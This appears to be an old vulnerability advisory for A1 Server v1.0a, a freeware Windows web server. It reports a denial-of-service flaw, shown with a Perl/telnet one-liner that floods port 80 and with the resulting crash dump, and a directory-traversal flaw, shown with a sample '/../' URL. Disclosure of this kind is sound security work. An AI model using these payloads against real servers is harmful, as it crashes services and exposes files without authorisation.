Vulnerability

    A1

Affected

    A1 Server v1.0a

Description

    'slipy' found following.   A1 Server v1.0a  is a HTTPd  server for
    the Windows  OS, and  it will  deliver the  following content: GIF
    impages, HTM or HTML pages, EXE files, and ZIP files.  The  server
    is very small, but yet somewhat stable and is freeware!

    Problem #1 : Denial of Service Attack
    =====================================
    A1 Server v1.0a is vulnerable to a nasty Denial of Service  attack
    where it can be flooded with useless junk until the server crashes
    promptly.  Once it has been crashed it needs to be restarted again
    for  it  to  work  properly.   All  windows  versions  apear to be
    affected.  Example:

        echo `perl -e 'print "A" x 1000'` | telnet a1server 80

    This will cause the program to quit within seconds and display:

        A1SERVER caused an invalid page fault in module
        A1SERVER.EXE at 016f:004101ae.
        Registers:
        EAX=00000000 CS=016f EIP=004101ae
        EFLGS=00010246 EBX=00420094 SS=0177
        ESP=006bfc70 EBP=006bfc78 ECX=ffffffff DS=0177
        ESI=00000001 FS=6417 EDX=004263b2 ES=0177
        EDI=00000001 GS=5e47 Bytes at CS:EIP:
        f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc
        Stack dump:
        004211a8 0000001c 006bfca8 004151db 004211a8
        00000001 006bfcb0 00008d20 006bfcfc bff7b796
        bffc9490 00000177 006bfcb8 bff7b828 006bfcc8
        bff7363b

    Problem #2 : Directory Traversal
    ================================
    Adding the string "/../" to an URL allows an attacker to view  any
    file on the server provided you  know where the file is at  in the
    first place.  Example:

        http://www.a1server.win/../../../../../../Scandisk.log

    This will obviously open the Scandisk.log fiel.

Solution

    Vendor has been notified. No e-mail reply yet.